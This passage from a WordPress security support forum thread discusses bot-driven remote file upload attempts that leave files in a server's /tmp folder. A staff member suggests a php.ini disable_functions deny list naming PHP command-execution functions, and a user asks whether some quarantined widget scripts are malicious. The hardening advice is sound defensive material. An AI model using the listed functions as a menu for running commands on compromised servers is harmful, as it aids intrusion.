    The files while they exist in the /tmp folder are not dangerous. The normal automated PHP process of handling uploaded files is that when a valid HTTP POST occurs using a POST Form, a file is uploaded to the /tmp folder and is automatically moved to another location such as the WordPress /uploads folder. Since the files are not automatically being moved anywhere that the uploaded files can be accessed or used to exploit or hack the websites, the hack/flaw is stopping at that point before it becomes dangerous. The flaw somewhere is that the files should not be allowed to be randomly uploaded at all by making a Remote file upload POST Request to any/all URIs. Only valid HTTP POST Requests made using a POST Form should be allowed to upload files. Successful Remote file uploads are accomplished by exploiting a POST Form that has a flaw/security vulnerability in the Form code that allows hacker files to be uploaded via that flawed/vulnerable Form. So the root problem is logically that either your Apache server or your PHP server has a configuration mistake or a flaw somewhere. If the attacks were not typical random Remote file upload attacks that we see every single day > all day long, and the attacks were instead targeting a particular specific target (Form, URI, etc.), then that would indicate a flaw/security vulnerability in a particular plugin or theme form. What is occurring on your server is that any/all random typical Remote file upload attacks are allowed to upload files to your server’s /tmp folder – that should not be happening.

    We don’t offer free or paid services for Server rebuilds/assessments/configurations/etc.  Most likely just upgrading your servers will do the trick.  That is where I would personally start.  😉

    #33757

    x
    Participant

    Upon reflection, I’m hosting many sites – and only a FEW are exhibiting this behaviour. Would not they all, if it was a bot attack?

    And I’ve looked at the vhost and php.ini files and don’t see anything remarkable. What sort of configuration errors might I look for?

    And upgrading 2.2 to 2.4 might break a LOT, alas….

    #33758

    AITpro Admin
    Keymaster

    I can’t tell you why the bot is only attacking some sites and not other sites. 69.197.145.178 is a colocation server hosted in a Kansas City, Missouri colocation facility and has been flagged publicly as a known SpamBot and HackerBot IP address. Logically you would be looking for anything that is related to anything that handles/processes file uploads. You can disable these functions, which are used in Remote file upload attacks and other attacks, in your php.ini file: disable_functions = system, exec, shell_exec, passthru, proc_open, proc_close, proc_get_status, proc_terminate, show_source, popen, pclose, pcntl_exec, posix_kill, posix_mkfifo, ftp_connect, ftp_login, ftp_exec, mysql_pconnect.
    You can do Google searches for search terms like: apache 2.2 remote file upload… We can only generally offer ideas, but could not possibly tell you exactly what needs to be done/fixed on your server. 😉

    #33760

    x
    Participant

    But is there any way to know if this is DANGEROUS to me? Any clue as to what they are actually able to do to damage the site or the server? That’s what’s really concerning me.

    Also – I’m having some questions about quarantining files. For example, on one of the attacked sites on June 8 some files were quarantined out of the wp-admin folder:

    -rw-r--r-- 1 web64 client0 3871 Jun 8 12:59 media-audio-widget.js
    -rw-r--r-- 1 web64 client0 1440 Jun 8 12:59 media-audio-widget.min.js
    -rw-r--r-- 1 web64 client0 4396 Jun 8 12:59 media-image-widget.js
    -rw-r--r-- 1 web64 client0 1616 Jun 8 12:59 media-image-widget.min.js
    -rw-r--r-- 1 web64 client0 6351 Jun 8 12:59 media-video-widget.js
    -rw-r--r-- 1 web64 client0 2595 Jun 8 12:59 media-video-widget.min.js
    -rw-r--r-- 1 web64 client0 36782 Jun 8 12:59 media-widgets.js
    -rw-r--r-- 1 web64 client0 12348 Jun 8 12:59 media-widgets.min.js
    -rw-r--r-- 1 web64 client0 11223 Jun 8 12:59 text-widgets.js
    -rw-r--r-- 1 web64 client0 3148 Jun 8 12:59 text-widgets.min.js
    [root@ns9 widgets]#

    Is this malicious? Or was this a normal WP upgrade? And any reason these would have been quarantined?
    Thanks again for all the help!
